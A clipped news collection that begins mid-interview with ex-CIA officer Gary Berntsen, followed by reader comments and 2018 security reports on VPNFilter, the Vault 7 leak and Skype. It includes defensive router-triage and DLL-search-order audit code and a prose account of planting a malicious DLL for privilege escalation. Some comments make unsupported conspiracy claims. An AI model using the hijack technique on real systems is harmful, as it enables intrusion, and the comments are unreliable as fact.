GB: I think part of the problem that we've seen during the handover of power from President Obama to President Trump was that there were a number of holdovers that went from political appointee to career status that had been placed in the NatSec apparatus and certain parts of the intelligence organisations. It is clear that President Trump and his team are determined to remove those people to make sure that there's a continuity of purpose and people aren't leaking information that would put the Administration into a negative light. That's the goal of the administration, to conduct itself consistent with the goals of securing the country from terrorism and other potential threats - whether they be counter-narcotics, or intelligence agencies trying to breach our, you know, the information that we hold secure.

SS: Here's a bit of conspiracy theories - could it be that the domestic surveillance agencies like the NSA or the FBI orchestrated the Vault 7 leaks - to damage CIA, stop it from infringing on their turf?

GB: I really don't think so and that is conspiracy thinking. You have to understand something, in the intelligence communities in the U.S., whether it be the CIA and FBI, we've done a lot of cross-fertilizations. When I was in senior position in CIA's counterterrorism center, I had a deputy who was an FBI officer. An office in FBI HQ down in Washington had an FBI lead with a CIA deputy. There's a lot more cooperation than one would think. There are individuals that do assignments in each other's organisations to help foster levels of cooperation. I had members of NSA in my staff when I was at CIA, members of diplomatic security, members of Alcohol, Tobacco and Firearms, and it was run like a task force, so, there's a lot more cooperation than the media presents, they always think that there are these huge major battles between the organisations and that's rarely true.

SS: Generally speaking - is there rivalry between American intel agencies at all? Competition for resources, maybe?

GB: I think, sometimes, between the Bureau and the CIA - the CIA is the dominant agency abroad, and the FBI is the dominant agency in the U.S. What they do abroad, they frequently have to get cleared by us, what we do domestically, we have to get cleared by them, and sometimes there's some friction, but usually, we're able to work this out. It makes for great news, the CIA fighting FBI, but the reality is that there's a lot more cooperation than confrontation. We are all in the business of trying to secure the American homeland and American interests globally.

SS: I'm still thinking a lot about the whole point of having this hacking arsenal for the CIA since you talk on their behalf - the possibility to hack phones, computers, TVs and cars - if the actual terrorist attacks on US soil, like San Bernardino, Orlando are still missed?

GB: Look. There are hundreds of individuals, if not thousands, planning efforts against the U.S. at any time. It can be many-many things. And the U.S. security services, there's the CIA, the FBI, NSA - block many-many of these things, but it is impossible to stop them all. Remember, this is an open society here, in America, with 320 million people, here. We try to foster open economic system, we allow more immigration to America than all countries in the world combined. This is a great political experiment here, but it's also very difficult to police. There are times that the U.S. security services are going to fail. It's inevitable. We just have to try the best we can, do the best job that we can, while protecting the values that attract so many people to the U.S.

SS: The former CIA director John Brennan is saying Trump's order to temporarily ban travel from some Muslim states is not going to help fight terrorism in 'any significant way'. And the countries where the terrorists have previously come from - like Saudi Arabia, or Afghanistan, it's true - aren't on the list. So does he maybe have a point?

GB: John Brennan is acting more like a political operative than a former director of CIA. The countries that Mr. Trump had banned initially, or at least had put a partial, sort of a delay on - were states like Somalia, Libya, the Sudan, Iran - places where we couldn't trust local vetting. Remember something, when someone immigrates to the U.S., we have what's called an "immigration packet": they may have to get a chest X-ray to make sure they don't bring any diseases with them, they have to have a background check on any place they've ever lived, and in most of these places there are no security forces to do background checks on people that came from Damascus, because parts of Damascus are totally destroyed - there's been warfare. It is actually a very reasonable thing for President Trump to ask for a delay in these areas. Look, the Crown-Prince, the Deputy Crown-Prince of Saudi Arabia was just in the United States and met with Donald Trump, and he said he didn't believe it was a "ban on Muslims". This was not a "ban on Muslims", it was an effort to slow down and to create more opportunity to vet those individuals coming from states where there's a preponderance of terrorist organisations operating. A reasonable step by President Trump, something he promised during the campaign, something he's fulfilling. But again, I repeat - America allows more immigration into the U.S. than all countries combined. So, we really don't need to be lectured on who we let in and who we don't let in.

SS: But I still wonder if the Crown-Prince would've had the same comment had Saudi Arabia been on that ban list. Anyways, Michael Hayden, ex-CIA

GB: Wait a second, Sophie - the Saudis have a reasonable form to police their society, and they provide accurate police checks. If they didn't create accurate police checks, we would've given the delay to them as well.

SS: Ok, I got your point. Now, Michael Hayden, ex-CIA and NSA chief, pointed out that the US intelligence enlists agents in the Muslim world with the promise of eventual emigration to America - is Trump's travel ban order going to hurt American intelligence gathering efforts in the Middle East?

GB: No, the question here - there were individuals that worked as translators for us in Afghanistan and Iraq and serving in such roles as translators, they were promised the ability to immigrate to the United States. Unfortunately, some of them were blocked in the first ban that was put down, because individuals who wrote that didn't consider that. That has been considered in the re-write that the Trump administration had submitted, which is now being attacked by a judge in Hawaii, and so it was taken into consideration, but the objective here was to help those that helped U.S. forces on the ground, especially those who were translators, in ground combat operations, where they risked their lives alongside American soldiers.

SS: You worked in Afghanistan - you were close to capturing Bin Laden back in 2001 - what kind of spying tools are actually used on the ground by the CIA to catch terrorists?

GB: The CIA, as does any intelligence service in the world, is a human business. It's a business where we work with local security forces to strengthen their police and intelligence forces, we attempt to leverage them, we have our own people on the ground that speak the language, we're trying to help build transportation there. There's no "secret sauce" here. There's no super-technology that changes the country's ability to conduct intelligence collections or operations. In Afghanistan the greatest thing that the U.S. has is broad support and assistance to Afghan men and women across the country. We liberated half of the population, and for women we're providing education, and when the people see what we were doing: trying to build schools, providing USAID projects - all of these things - this makes the population willing to work with and support the United States. Frequently, members of the insurgent groups will see this and sometimes they do actually cross the lines and cooperate with us. So, it's a full range of American political power, whether it's hard or soft, that is the strength of the American intelligence services - because people in the world actually believe - and correctly so - that America more than generally is a force of good in the world.

SS: Gary, thank you so much for this interesting interview and insight into the world of the CIA. We've been talking to Gary Berntsen, former top CIA officer, veteran of the agency, talking about the politics of American intelligence in the Trump era. That's it for this edition of SophieCo, I will see you next time.

GreenPizza:

Just thinking here in the light of how things are unfolding with the CIA, I am wondering, since Federal crimes are committed, can the FBI investigate the CIA, acting as America's Federal Law Enforcement?

RedBlowDryer -> GreenPin

I think the US intelligence agencies are harming their country more than any enemy of the US.

CyanGrapes

There is a reason why JFK wanted to dismantle the CIA. This guy is lying.

PurpleWieghts

CIA needs hacking tools to make it look like it was carried out by another state simply for plausible deniability.

Carl Zaisser

a "force for good in the world"?...sounds like the American white hat-black hat myth...read Naomi Klein's "The Shock Doctrine: The Rise of Disaster Capitalism". This is a detailed litany of America's various kinds of interventions in multiple countries that could hardly be described as "a force for good in the world"...a force for "America's values" (read ironically), perhaps

Carl Zaisser

WHO is responsible for the outbreak of chaotic warfare in Libya and Syria?

Should we trust the Saudi vetting services...think of who the September 11 bombers were? Was there another reason they were not on Trump's banned countries list? Too big to mess with, i.e., oil and weapons sales?

GreenPin

Amazing how they justify their destructive behaviour in a way as if they are serving the American people and doing good around the world. You can sugar-coat your crimes against humanity as much as you can, but the reality of today's human misery speaks for itself.

waterbearer

since the United States was founded in 1776, she has been at war during 214 out of her 235 calendar years of existence

XXX

interesting, but begs the question "Can we really trust what this guy tells us?" If not, what parts can we trust, and what parts can't we?

XXX

You'd have to deconstruct his talking points and I don't know how that is done. Intelligence probably knows how to do that. I noticed he was becoming more zealous on hegemony and exceptionalism as the interview neared the end.

I agree. Berntsen is almost likably energetic, but he is, in the end, an uncompromising warrior of the empire.

XXX

if Trump is to be controlled--they gotta have some dirt--or threat against his family --it's how they operate---

XXX

Mr. Berntsen left out the very important NSC10/2 legislation, which gave the CIA free rein with deniability as the cover. This needs to be repealed. With this legislation, the CIA answers to no one, and goes around the world wreaking havoc with the governments and people where they like. We will never have peace until that legislation is repealed.

XXX

This is why interesting books to read about the history of the CIA.

XXX

I applaud former CIA and FBI officer Gary Berntsen for speaking out on the most powerful intelligence networks on the planet regarding their surveillance activities. Every nation needs intelligence to safeguard itself, but if we go beyond the call of duty and get exposed, this leaves Pres. Trump and his Adm. with no option but to consider corrective measures with a visit to Langley etc. Here again the failures of Liberalism are coming up in the wash for cleaning up.

XXX

Liberalism has not been running the country for the last 54 years. We have been under a coup government and just got used to it.

[May 28, 2018] Stealthy, Destructive Malware Infects Half a Million Routers WIRED by Andy Greenberg

May 28, 2018 | www.wired.com

Home routers have become the rats to hackers' bubonic plague: an easily infected, untreated, and ubiquitous population in which dangerous digital attacks can spread. Now security researchers are warning that one group of sophisticated hackers has amassed a collection of malware-infected routers that could be used as a powerful tool to spread havoc across the internet, or simply triggered to implode networks across the globe.

On Wednesday, Cisco's Talos security division warned of a new breed of malware it calls VPNFilter, which it says has infected at least half a million home and small business routers, including those sold by Netgear, TP-Link, Linksys, MikroTik, and QNAP network storage devices. Talos believes that the versatile code is designed to serve as a multipurpose spy tool, and also creates a network of hijacked routers that serve as unwitting VPNs, potentially hiding the attackers' origin as they carry out other malicious activities. Perhaps most disturbingly, they note the tool also has a destructive feature that would allow the hackers behind it to immediately corrupt the firmware of the entire collection of hacked routers, essentially bricking them.

"This actor has half a million nodes spread out over the world and each one can be used to control completely different networks if they want," says Craig Williams, who leads Talos' security research team. "It's basically an espionage machine that can be retooled for anything they want."


Exactly how VPNFilter infects its targets isn't yet clear. But home routers are notoriously prone to vulnerabilities that can allow remote hackers to take them over, and rarely receive software updates. "This is a set of devices that's getting targeted more and more over the years," says Michael Daniel, the head of the Cyber Threat Alliance, a security industry group that's working with Cisco's Talos to alert the industry to the VPNFilter threat and hasten its removal. "They sit outside firewalls, they don't have native antivirus, they're hard to patch."

Talos writes in a detailed blog post that the VPNFilter malware is capable of siphoning off any data that passes through the network devices it infects, and appears specifically designed to monitor credentials entered into websites. Another, largely unexplained spying feature of the tool seems to watch for communications over the ModBUS SCADA protocol that's used for controlling automated equipment and internet-of-things devices.

But Talos' Williams also points out that the mass of hacked routers can also function as a collection of proxies for other activities the hackers might engage in -- from penetrating other targets to distributed denial-of-service attacks designed to knock websites offline. Hence the VPN in its name. "We assess with high confidence that this malware is used to create an expansive, hard-to-attribute infrastructure that can be used to serve multiple operational needs of the threat actor," Talos' blog post reads.

[May 27, 2018] F.B.I.'s Urgent Request Reboot Your Router to Stop Russia-Linked Malware

This kind of threat is often exaggerated by security companies, so it should not be taken at face value. But truth be told, home routers present a dismal security picture and are easily compromised. The dismal state of home router security came to public attention during the Hillary Clinton bathroom email server saga.
VPNFilter attacks only selected models from 4 manufacturers (but some of the affected models are really popular): Linksys, MikroTik, NETGEAR, TP-LINK. Cisco, Juniper, Zyxel and other manufacturers are not affected. A list of affected devices is available (probably not complete).
Upgrading the firmware is a good idea in any case. The same is true of disabling remote management.
May 27, 2018 | www.nytimes.com

The F.B.I. has several recommendations for any owner of a small office or home office router. The simplest thing to do is reboot the device, which will temporarily disrupt the malware if it is present. Users are also advised to upgrade the devices' firmware and to select a new secure password. If any remote-management settings are in place, the F.B.I. suggests disabling them.


An analysis by Talos, the threat intelligence division for the tech giant Cisco, estimated that at least 500,000 routers in at least 54 countries had been infected by the malware, which the F.B.I. and cybersecurity researchers are calling VPNFilter. Among the affected networking equipment it found during its research were devices from manufacturers including Linksys, MikroTik, Netgear and TP-Link.

To disrupt the Sofacy network, the Justice Department sought and received permission to seize the web domain toknowall.com, which it said was a critical part of the malware's "command-and-control infrastructure." Now that the domain is under F.B.I. control, any attempts by the malware to reinfect a compromised router will be bounced to an F.B.I. server that can record the I.P. address of the affected device.

[May 27, 2018] VPNFilter is a malware timebomb lurking on your router? by Paul Ducklin

May 27, 2018 | nakedsecurity.sophos.com

Don't delay – do it today!

[May 27, 2018] Cisco's Talos Intelligence Group Blog New VPNFilter malware targets at least 500K networking devices worldwide

May 27, 2018 | blog.talosintelligence.com

We recommend that:

Due to the potential for destructive action by the threat actor, we recommend out of an abundance of caution that these actions be taken for all SOHO or NAS devices, whether or not they are known to be affected by this threat.

... ... ...

The stage 2 malware first sets up the working environment by creating a modules folder (/var/run/vpnfilterm) and a working directory (/var/run/vpnfilterw). Afterward, it will run in a loop, where it first reaches out to a C2 server, and then executes commands retrieved from the C2. The command names are encrypted with the same broken RC4 function as in stage 1. Fortunately, older versions of x86 stage 2 sample were very verbose, and debug printed all the steps it performed. Newer versions of the x86 stage 2 did not contain the debug prints, nor did the MIPS sample.

The x86 sample can perform the following operations:

The MIPS sample has the following additional operations:

Until the Tor module is installed, stage 2 will use one or more IPs stored in its configuration as SOCKS5 proxies to Tor and attempt to communicate with a control panel also found in its configuration. Like in stage 1, the communication between the malware and the proxy will connect over a verified SSL connection. When the Tor module is installed, it will connect to .onion domains through the local SOCKS5 proxy provided by the module over plain HTTP instead. We used a fake SOCKS5 proxy, which redirects all traffic to INetSim for analysis.

[May 27, 2018] VPNFilter: What we know about the malware infecting routers around the globe by Ellen Tannam

May 25, 2018 | www.siliconrepublic.com

A multistage malware variant, VPNFilter consists of three separate steps, with the second stage allowing for communication over Tor.

Symantec published a list of the identified targeted devices, which include numerous models of consumer routers:

[May 27, 2018] Talos Reports That Router Based Malware, VPNFilter, Has Over 500,000 Impacted Devices - Agile IT

May 27, 2018 | www.agileit.com

The malware is modular, meaning that additional capabilities can be added to provide new functionalities, but also that functions can be removed, hence masking the full capabilities of the software. The VPNFilter modules Talos has identified so far are grouped into Stage 1, Stage 2 and Stage 3.

VPNFilter's capabilities make it particularly dangerous, as it is more of a distributed toolkit than a single point attack.

Response

Talos has technical response details available on its blog, including Snort signatures, known Command and Control IP addresses to block and configuration settings for Stealthwatch.

Devices with known vulnerabilities

LINKSYS DEVICES:

E1200
E2500
WRVS4400N

MIKROTIK CLOUD CORE ROUTERS:

1016
1036
1072

NETGEAR DEVICES:

DGN2200
R6400
R7000
R8000
WNR1000
WNR2000

QNAP DEVICES:

TS251
TS439 Pro
Other QNAP NAS devices running QTS software

TP-LINK DEVICES:

R600VPN
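The F.B.I. recommendations above (reboot, update firmware, new password, disable remote management), the stage 2 working directories named in the Talos excerpt and the affected-model list can be combined into a simple inventory triage. The following is an added example, not Talos', Symantec's or the F.B.I.'s code; the Device fields, the severity scale and the inventory are constructed for illustration, and directory observations are assumed to come from a shell session on the device.

```python
"""VPNFilter exposure triage for a small inventory of SOHO routers and NAS boxes."""
from dataclasses import dataclass

# Models the page lists under "Devices with known vulnerabilities" (vendor -> models).
KNOWN_AFFECTED = {
    "linksys": {"E1200", "E2500", "WRVS4400N"},
    "mikrotik": {"CCR1016", "CCR1036", "CCR1072"},  # Cloud Core Routers 1016/1036/1072
    "netgear": {"DGN2200", "R6400", "R7000", "R8000", "WNR1000", "WNR2000"},
    "qnap": {"TS251", "TS439 Pro"},                 # plus other QNAP NAS running QTS
    "tp-link": {"R600VPN"},
}

# Directories the Talos write-up says stage 2 creates for its modules and working data.
STAGE2_DIRS = frozenset({"/var/run/vpnfilterm", "/var/run/vpnfilterw"})

SEVERITY = {"CRITICAL": 3, "HIGH": 2, "MEDIUM": 1, "INFO": 0}  # constructed scale


@dataclass
class Device:
    """Assumed inventory record; the flags would come from the device's admin UI or CLI."""
    name: str
    vendor: str
    model: str
    remote_mgmt: bool               # management interface reachable from the WAN side
    firmware_current: bool          # running the vendor's latest firmware
    default_password: bool          # admin password never changed
    runs_qts: bool = False          # QNAP QTS firmware (the list covers other QTS NAS too)
    dirs: frozenset = frozenset()   # directories observed under /var/run, e.g. via SSH


def is_listed(dev):
    """True if the page's affected-model list covers this device."""
    vendor = dev.vendor.lower()
    if dev.model in KNOWN_AFFECTED.get(vendor, set()):
        return True
    return vendor == "qnap" and dev.runs_qts


def triage(dev):
    """Return (severity, finding, action) tuples for one device, most severe first."""
    findings = []
    hit = STAGE2_DIRS & dev.dirs
    if hit:  # stage 2 artefacts on the box: treat as infected, not merely exposed
        findings.append(("CRITICAL",
                         "stage 2 working directory present: " + ", ".join(sorted(hit)),
                         "isolate, reboot, reflash firmware, then set a new password"))
    if is_listed(dev):
        findings.append(("HIGH", f"{dev.vendor} {dev.model} is on the known-affected list",
                         "reboot now (disrupts a running infection); upgrade firmware"))
    if dev.remote_mgmt:
        findings.append(("MEDIUM", "remote management enabled", "disable remote management"))
    if not dev.firmware_current:
        findings.append(("MEDIUM", "firmware out of date", "upgrade firmware"))
    if dev.default_password:
        findings.append(("MEDIUM", "default admin password in use", "set a new, unique password"))
    if not findings:
        # The page describes the model list as probably incomplete, so "not listed"
        # is not "not affected": the precautionary reboot still applies.
        findings.append(("INFO", "no indicators; model not on the (incomplete) list",
                         "reboot as a precaution; keep firmware current"))
    findings.sort(key=lambda f: SEVERITY[f[0]], reverse=True)
    return findings


def worst(dev):
    """Highest severity label for the device."""
    return triage(dev)[0][0]


# Constructed inventory; none of these are real devices.
INVENTORY = [
    Device("office-gw", "Netgear", "R7000", remote_mgmt=True, firmware_current=False,
           default_password=False,
           dirs=frozenset({"/var/run/vpnfilterm", "/var/run/vpnfilterw", "/var/run/dhcp"})),
    Device("branch-nas", "QNAP", "TS-CONSTRUCTED", remote_mgmt=False, firmware_current=True,
           default_password=True, runs_qts=True),
    Device("home-ap", "ExampleVendor", "EV-100", remote_mgmt=False, firmware_current=True,
           default_password=False),
]

if __name__ == "__main__":
    for dev in INVENTORY:
        print(f"== {dev.name} ({dev.vendor} {dev.model}): {worst(dev)}")
        for sev, what, action in triage(dev):
            print(f"   [{sev}] {what} -> {action}")
```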

[May 15, 2018] Suspect Identified in C.I.A. Leak Was Charged, but Not for the Breach - The New York Times

May 15, 2018 | www.nytimes.com

... ... ...

[Vault 7] was the largest loss of classified documents in the agency's history and a huge embarrassment for C.I.A. officials.

Now, the prime suspect in the breach has been identified: a 29-year-old former C.I.A. software engineer who had designed malware used to break into the computers of terrorism suspects and other targets, The New York Times has learned.

Agents with the Federal Bureau of Investigation searched the Manhattan apartment of the suspect, Joshua A. Schulte, one week after WikiLeaks released the first of the C.I.A. documents in March last year, and then stopped him from flying to Mexico on vacation, taking his passport, according to court records and relatives. The search warrant application said Mr. Schulte was suspected of "distribution of national defense information," and agents told the court they had retrieved "N.S.A. and C.I.A. paperwork" in addition to a computer, tablet, phone and other electronics.

But instead of charging Mr. Schulte in the breach, referred to as the Vault 7 leak, prosecutors charged him last August with possessing child pornography, saying agents had found 10,000 illicit images on a server he created as a business in 2009 while studying at the University of Texas at Austin.

Court papers quote messages from Mr. Schulte that suggest he was aware of the encrypted images of children being molested by adults on his computer, though he advised one user, "Just don't put anything too illegal on there."

In September, Mr. Schulte was released on the condition that he not leave New York City, where he lived with a cousin, and keep off computers. He was jailed in December after prosecutors found evidence that he had violated those rules, and he has been held at the Metropolitan Correctional Center in Manhattan since then. He has posted on Facebook under a pseudonym a series of essays critical of the criminal justice system.

It is unclear why, more than a year after he was arrested, he has not been charged or cleared in connection with Vault 7. Leak investigators have had access to electronic audit trails inside the C.I.A. that may indicate who accessed the files that were stolen, and they have had possession of Mr. Schulte's personal data for many months.

... ... ...

According to his family and his LinkedIn page, Mr. Schulte did an internship at the National Security Agency while working on a bachelor's degree in computer engineering. He worked in the C.I.A.'s Engineering Development Group, which designed the hacking tools used by its Center for Cyber Intelligence. He left the agency in November 2016 and moved to New York to work for Bloomberg L.P. as a software engineer.

Most of the government's cyberespionage is carried out by the N.S.A., but the C.I.A. also employs hackers. The leaked Vault 7 documents came from the agency's Engineering Development Group and included descriptions and instructions for the use of agency hacking tools, but only a small amount of the actual computer code for the tools.

.... ... ...

[Apr 17, 2018] U.S., British governments warn businesses worldwide of Russian campaign to hack routers by Ellen Nakashima

Looks like the US and British governments do not like competition ;-)
"These network devices make "ideal targets," said Manfra, Homeland Security's assistant secretary for cybersecurity and communications." -- she knows what she is talking about...
The problems here are "very cheap" and "very old" routers and weak firewalls (see "Your Router's Security Stinks: Here's How to Fix It"). For those who are into this business it might be beneficial these days to use a separate firewall unit and a "honeypot" in front of the router. You may wish to buy a low-end commercial-grade Wi-Fi/Ethernet router, which retails for about $200, rather than a consumer-friendly router that can cost as little as $20.
Apr 16, 2018 | www.washingtonpost.com

The unusual public warning from the White House, U.S. agencies and Britain's National Cyber Security Center follows a years-long effort to monitor the threat. The targets number in the millions, officials say, and include "primarily government and private-sector organizations, critical infrastructure providers, and the Internet service providers (ISPs) supporting these sectors."

... ... ...

These network devices make "ideal targets," said Manfra, Homeland Security's assistant secretary for cybersecurity and communications. Most traffic within a company or between organizations traverses them. So a hacker can monitor, modify or disrupt it, she said. And they're usually not secured at the same level as a network server.

"Once you own the router, you own the traffic that's traversing the router," she said.

... ... ...

Ellen Nakashima is a national security reporter for The Washington Post. She covers cybersecurity, surveillance, counterterrorism and intelligence issues. She has also served as a Southeast Asia correspondent and covered the White House and Virginia state politics. She joined The Post in 1995. Follow @nakashimae

jedediah smytheson, 3 hours ago

It is appropriate to reveal and decry misbehavior in cyberspace. What is not appropriate is our leaders ignoring their own responsibility to secure government networks. The sad fact is that senior leaders in government do not understand the issue and are unwilling to accept any inconvenience. The Federal government has lost huge amounts of very sensitive data of AT LEAST 100 million citizens. If I remember correctly, OPM lost 23 million electronic security clearance forms (SF 86s) with personal information not only of the person being processed for a clearance, but also of the members of that person's family. That's how I came up with over 100 million. And what was the result? Well, no one was held accountable or responsible for this incredible breach of security. More importantly, the networks are still not well secured. In summary, we will be hacked continuously until someone in Government takes this seriously and puts more resources into securing the networks rather than turning the public's attention away from their own incompetence and focusing on our adversaries.

bluefrog, 4 hours ago

Haha ... the U.K. who secretly tapped the fiber optic cables running under the Atlantic Ocean to record EVERYONE's private data is now advising against hackers! A degenerate country operating on the basis of lies and deceit, I don't trust them as far as I can throw them.

hkbctkny, 4 hours ago

This is really nothing new [ https://www.us-cert.gov/ncas/alerts/TA18-106A ] - most of this has been going on forever, even skript kiddies were on it back in the day.

The only part that might be news is if there's evidence of a concerted, targeted campaign from one very organized actor. Haven't seen the evidence presented, though, and my scans are basically what they've always been: hundreds and hundreds from residential CPE and other compromised machines from all over the world.

Update your firmware - even old devices can be updated, for the most part; turn off remote mgt (!), change the password to something that YOU set.

Make it challenging, at least.
4 hours ago
Really no different from the NSA and GCHQ..........

[Mar 27, 2018] Meet the Tiny Startup That Sells IPhone and Android Zero Days To Governments

Mar 27, 2018 | it.slashdot.org

(vice.com) The story of Azimuth Security, a tiny startup in Australia, provides a rare peek inside the secretive industry that helps government hackers get around encryption. Azimuth is part of an opaque, little known corner of the intelligence world made of hackers who develop and sell expensive exploits to break into popular technologies like iOS, Chrome, Android and Tor.

[Mar 27, 2018] Skype Can't Fix a Nasty Security Bug Without a Massive Code Rewrite

Mar 27, 2018 | it.slashdot.org

(zdnet.com) BeauHD on Monday February 12, 2018 @10:00PM from the back-to-the-drawing-board dept. ZDNet reports of a security flaw in Skype's updater process that "can allow an attacker to gain system-level privileges to a vulnerable computer." If the bug is exploited, it "can escalate a local unprivileged user to the full 'system' level rights -- granting them access to every corner of the operating system." What's worse is that Microsoft, which owns Skype, won't fix the flaw because it would require the updater to go through "a large code revision." Instead, Microsoft is putting all its resources on building an altogether new client. From the report: Security researcher Stefan Kanthak found that the Skype update installer could be exploited with a DLL hijacking technique, which allows an attacker to trick an application into drawing malicious code instead of the correct library. An attacker can download a malicious DLL into a user-accessible temporary folder and rename it to an existing DLL that can be modified by an unprivileged user, like UXTheme.dll. The bug works because the malicious DLL is found first when the app searches for the DLL it needs. Once installed, Skype uses its own built-in updater to keep the software up to date. When that updater runs, it uses another executable file to run the update, which is vulnerable to the hijacking. The attack reads on the clunky side, but Kanthak told ZDNet in an email that the attack could be easily weaponized. He explained, providing two command line examples, how a script or malware could remotely transfer a malicious DLL into that temporary folder.
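The condition the Skype report describes, a privileged process resolving a DLL by bare name through a search order that probes a user-writable folder before the genuine library's folder, can be audited from an ordered list of directories and their writability. The following added example is not Kanthak's, Skype's or Microsoft's code; the directory data is constructed, and a real audit would take the search order from the process and writability from each directory's ACL.

```python
"""Audit a DLL search order for hijack exposure when a privileged process loads by bare name."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Dir:
    """One directory in the search order (constructed model of what an ACL check would yield)."""
    path: str
    user_writable: bool              # an unprivileged user can create or replace files here
    files: frozenset = frozenset()   # lowercase file names present


def resolve(dll, search_dirs):
    """Index of the first directory in search order that holds dll, or None if no copy exists."""
    name = dll.lower()               # Windows file names compare case-insensitively
    for i, d in enumerate(search_dirs):
        if name in d.files:
            return i
    return None


def audit(dll, search_dirs):
    """Report whether a load of dll by bare name can be redirected by an unprivileged user.

    Exposure exists when such a user can write to the directory that wins the search
    (the genuine file can be replaced) or to any directory probed before it (a copy
    planted there wins instead, which is the UXTheme.dll case described above).
    """
    idx = resolve(dll, search_dirs)
    probed = search_dirs if idx is None else search_dirs[: idx + 1]
    writable = [d.path for d in probed if d.user_writable]
    return {
        "dll": dll,
        "resolved_from": None if idx is None else search_dirs[idx].path,
        "writable_before_or_at": writable,
        "exposed": bool(writable),
    }


def harden(search_dirs):
    """Mitigation modelled here: every user-writable directory is removed from the order,
    which is the effect of loading system libraries by absolute path from a protected
    directory instead of letting the loader probe the updater's own (temporary) folder."""
    return [d for d in search_dirs if not d.user_writable]


# Constructed directories; paths are illustrative, not observations from a real host.
TEMP = Dir(r"C:\Users\alice\AppData\Local\Temp", user_writable=True)
PROGRAM_DIR = Dir(r"C:\Program Files\ExampleApp", user_writable=False, files=frozenset({"app.exe"}))
SYSTEM32 = Dir(r"C:\Windows\System32", user_writable=False,
               files=frozenset({"uxtheme.dll", "kernel32.dll"}))

# Updater extracted to and run from the temp folder: that folder is probed first.
UNSAFE_ORDER = [TEMP, SYSTEM32]
# Updater run from a protected install directory: no writable directory precedes System32.
SAFE_ORDER = [PROGRAM_DIR, SYSTEM32]

if __name__ == "__main__":
    for label, order in (("unsafe", UNSAFE_ORDER), ("hardened", harden(UNSAFE_ORDER)),
                         ("safe", SAFE_ORDER)):
        print(label, audit("UXTheme.dll", order))
```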

[Mar 27, 2018] Facebook Gave Data About 57 Billion Friendships To Academic

Mar 27, 2018 | tech.slashdot.org

(theguardian.com) an anonymised, aggregate dataset of 57bn Facebook friendships. From a report: Facebook provided the dataset of "every friendship formed in 2011 in every country in the world at the national aggregate level" to Kogan's University of Cambridge laboratory for a study on international friendships published in Personality and Individual Differences in 2015. Two Facebook employees were named as co-authors of the study, alongside researchers from Cambridge, Harvard and the University of California, Berkeley. Kogan was publishing under the name Aleksandr Spectre at the time. A University of Cambridge press release on the study's publication noted that the paper was "the first output of ongoing research collaborations between Spectre's lab in Cambridge and Facebook." Facebook did not respond to queries about whether any other collaborations occurred. "The sheer volume of the 57bn friend pairs implies a pre-existing relationship," said Jonathan Albright, research director at the Tow Center for Digital Journalism at Columbia University. "It's not common for Facebook to share that kind of data. It suggests a trusted partnership between Aleksandr Kogan/Spectre and Facebook."

[Mar 27, 2018] A Hacker Has Wiped a Spyware Company's Servers -- Again

Mar 27, 2018 | it.slashdot.org

(vice.com) spyware to everyday consumers and wiped their servers, deleting photos captured from monitored devices. A year later, the hacker has done it again. Motherboard: Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent. Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners' and children's phones in order to spy on them. This software has been called "stalkerware" by some.

[Mar 27, 2018] Salon Magazine Mines Monero On Your Computer If You Use an Ad Blocker

Mar 27, 2018 | hardware.slashdot.org

(bbc.com) BeauHD on Monday February 19, 2018 @06:00AM from the crypto-cash dept. dryriver shares a report from BBC: News organizations have tried many novel ways to make readers pay -- but this idea is possibly the most audacious yet. If a reader chooses to block its advertising, U.S. publication Salon will use that person's computer to mine for Monero, a cryptocurrency similar to Bitcoin. Creating new tokens of a cryptocurrency typically requires complex calculations that use up a lot of computing power. Salon told readers: "We intend to use a small percentage of your spare processing power to contribute to the advancement of technological discovery, evolution and innovation." The site is making use of CoinHive, a controversial mining tool that was recently used in an attack involving government websites in the UK, U.S. and elsewhere. However, unlike that incident, where hackers took control of visitors' computers to mine cryptocurrency, Salon notifies users and requires them to agree before the tool begins mining.

[Mar 27, 2018] Flight Sim Company Embeds Malware To Steal Pirates' Passwords

Mar 27, 2018 | yro.slashdot.org

(torrentfreak.com) Flight sim company FlightSimLabs has found itself in trouble after installing malware onto users' machines as an anti-piracy measure. Code embedded in its A320-X module contained a mechanism for detecting 'pirate' serial numbers distributed on The Pirate Bay, which then triggered a process through which the company stole usernames and passwords from users' web browsers.

[Mar 27, 2018] MoviePass CEO Proudly Says App Tracks Your Location Before, After Movies

Mar 27, 2018 | yro.slashdot.org

(techcrunch.com) BeauHD on Tuesday March 06, 2018 @03:00AM from the head-held-high dept. MoviePass CEO Mitch Lowe told an audience at a Hollywood event last Friday that the app tracks moviegoers' locations before and after each show they watch. "We get an enormous amount of information," Lowe said. "We watch how you drive from home to the movies. We watch where you go afterwards." His talk at the Entertainment Finance Forum was entitled "Data is the New Oil: How will MoviePass Monetize It?" TechCrunch reports: It's no secret that MoviePass is planning on making hay out of the data collected through its service. But what I imagined, and what I think most people imagined, was that it would be interesting next-generation data about ticket sales, movie browsing, A/B testing on promotions in the app and so on. I didn't imagine that the app would be tracking your location before you even left your home, and then follow you while you drive back or head out for a drink afterwards. Did you? It sure isn't in the company's privacy policy, which in relation to location tracking discloses only a "single request" when selecting a theater, which will "only be used as a means to develop, improve, and personalize the service." Which part of development requires them to track you before and after you see the movie? A MoviePass representative said in a statement to TechCrunch: "We are exploring utilizing location-based marketing as a way to help enhance the overall experience by creating more opportunities for our subscribers to enjoy all the various elements of a good movie night. We will not be selling the data that we gather. Rather, we will use it to better inform how to market potential customer benefits including discounts on transportation, coupons for nearby restaurants, and other similar opportunities."

[Mar 27, 2018] Half of Ransomware Victims Didn't Recover Their Data After Paying the Ransom

Mar 27, 2018 | it.slashdot.org

